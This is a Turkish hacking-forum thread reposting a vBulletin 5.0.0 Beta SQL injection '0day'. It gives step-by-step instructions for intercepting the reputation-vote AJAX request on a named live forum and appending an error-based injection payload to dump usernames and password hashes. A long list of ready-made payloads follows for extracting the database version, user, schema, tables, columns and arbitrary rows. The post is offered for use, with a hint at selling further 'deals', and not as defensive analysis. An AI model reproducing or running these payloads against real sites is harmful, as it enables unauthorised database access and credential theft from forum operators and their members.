Şifremi Unuttum?   -   Üye Ol





Elit Üyelik Bilgi Formu İçin Tıklayınız



Yeni Yorum Gönder 
 
Konuyu Oyla:
  • Toplam: 0 Oy - Ortalama: 0
  • 1
  • 2
  • 3
  • 4
  • 5
vBulletin 5.0.0.0 SQLi Exploit 0day
Yazar Konu
LuKe Çevrimdışı
Forum Üyesi
**

Yorum Sayısı: 5
Üyelik Tarihi: Nov 2013
Rep Puanı: 0
Yorum: #1
vBulletin 5.0.0.0 SQLi Exploit 0day
Alıntı:Bulletin 5.0.0 all Beta releases SQL Injection Exploit 0day

#Category: web application
#Type: SQL Injection
#Requirements: Firefox/Live HTTP Headers/
#Dork: Powered by vBulletin™ Version 5.0.0 Beta (or) Use ur Brain you'll get more o_O


Step 1
Create an Account on vBulletin forum Verify the account and Activate it

For Demo we will use this Forum
Link = http://www.prospectrush.com/new_forum/
I have alredy made an account so i wil direct login


Step 2
go to/Open any topic and open Live HTTP Headers (https://addons.mozilla.org/en/firefox/ad...p-headers/) << download from here
and then on the Topic page search for "Like" button and Clik on it ....
then the Http responce would be caught on HTTP HEaders addon

Step 3
Go to the first POST in HTTP Headers ,it will look like this
POST *Something /ajax/api/reputation/vote HTTP/1.1
select it and click on Replay button

Step 4
Then go on Send POST Content and use below Query ,
just add the Below Query after "noteid=somenumber"
=======================
SQL Query

) and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,username,0x27,0x7e,password,0x27, 0x7e) FROM user LIMIT 1,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND (1338=1338

=======================

The Above SQLi command will fetch out the first record from user table(username/password)

see the username and pass in encrypted get the salt to and decrypt it i wont show decrypting use your brain Smile


=============



Greets to Real Author , All Indian & Pakistani Brothers , 1337day , ashiyane forums & All Indian Hacking Groups

//Note : Those Brothers who have my mail id can Contact me for other Deals
Offer Valid till 29th March 2013

Regards
./NoTty_rAJ

Thanks


[#Other SQLi Syntaxes]

********************************************************************************​*************************************
|Version():
********************************************************************************​*************************************
) and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,cast(version() as char),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND (1338=1338
********************************************************************************​*************************************



********************************************************************************​*************************************
|User():
********************************************************************************​*************************************
********************************************************************************​*************************************
) and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,cast(user() as char),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND (1338=1338
********************************************************************************​*************************************



********************************************************************************​*************************************
|Database():
********************************************************************************​*************************************
********************************************************************************​*************************************
) and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,cast(database() as char),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND (1338=1338
********************************************************************************​*************************************


********************************************************************************​*************************************
|Database Print:
********************************************************************************​*************************************
********************************************************************************​*************************************
) and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,0x27,cast(schema_name as char),0x27,0x7e) FROM information_schema.schemata LIMIT 1,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND (1338=1338
********************************************************************************​*************************************



********************************************************************************​*************************************
|Table Count:
********************************************************************************​*************************************
********************************************************************************​*************************************
) and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,count(table_name),0x27,0x7e) FROM `information_schema`.tables WHERE table_schema=0xHEXCODEOFDATABASE)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND (1338=1338
********************************************************************************​*************************************



********************************************************************************​*************************************
|Print Tables:
********************************************************************************​*************************************
********************************************************************************​*************************************
) and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,0x27,cast(table_name as char),0x27,0x7e) FROM information_schema.tables Where table_schema=0xHEXCODEOFDATABASE LIMIT N,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND (1338=1338
********************************************************************************​*************************************



********************************************************************************​*************************************
|Columns of selected table:
********************************************************************************​*************************************
********************************************************************************​*************************************
) and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,count(column_name),0x27,0x7e) FROM `information_schema`.columns WHERE table_schema=0xhex_code_of_database_name AND table_name=0xhex_code_of_table_name)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND (1338=1338
********************************************************************************​*************************************



********************************************************************************​*************************************
|Fetch Out Data:
********************************************************************************​*************************************
********************************************************************************​*************************************
) and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,column1,0x27,0x7e,column2,0x27,0x 7e) FROM ANY_TABLE LIMIT N,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND (1338=1338
********************************************************************************​*************************************

ORJİNAL ADRES
11-30-2013 12:29
Tüm Mesajlarına Bak Alıntı ile Cevapla
Yeni Yorum Gönder 


Konu ile Alakalı Benzer Konular
Konular Yazar Yorumlar Okunma Son Yorum
  Exploit Kullanımı rootmaster 0 2,070 11-20-2013 23:29
Son Yorum: rootmaster
  Exploit Nedir ve Niçin Kullanırlar ? Leon 0 1,940 10-04-2013 16:14
Son Yorum: Leon

Hızlı Menü:


Şu anda bu konuyu okuyanlar: 1 Ziyaretçi

İletişim | CesurForum | Yukarı Git | İçeriğe Git | Arşiv | RSS Beslemesi



Bu Web Sitesi Zumbak Hosting Tarafindan Barındırılmaktadır.


5651 Sayılı Kanun’un 8. maddesine ve T.C.K’nın 125. maddesine göre TÜM ÜYELERİMİZ yaptıkları paylaşımlardan sorumludur. Sitemiz, hukuka, yasalara, telif haklarına ve kişilik haklarına saygılı olmayı amaç edinmiştir. Sitemiz, 5651 sayılı yasada tanımlanan “yer sağlayıcı” olarak hizmet vermektedir. İlgili yasaya göre, site yönetiminin hukuka aykırı içerikleri kontrol etme yükümlülüğü YOKTUR!Bu sebeple, sitemiz “uyar ve kaldır” prensibini benimsemiştir. Telif hakkına konu olan eserlerin yasal olmayan bir biçimde paylaşıldığını ve yasal haklarının çiğnendiğini düşünen hak sahipleri veya meslek birlikleri, BURADAN bize ulaşabilirler. Buraya ulaşan talep ve şikayetler Hukuk Müşavirimiz tarafından incelenecek, şikayet yerinde görüldüğü takdirde ihlal olduğu düşünülen içerikler sitemizden kaldırılacaktır.Ayrıca, mahkemelerden talep gelmesi halinde hukuka aykırı içerik üreten ve hukuka aykırı paylaşımda bulunan üyelerin tespiti için gerekli teknik veriler sağlanacaktır.Sitemiz üzerinden yapılan satış ilanları sadece firmalar için olup, kötüye kullanımından doğacak hasarlardan kesinlikle sitemiz sorumlu tutulamaz.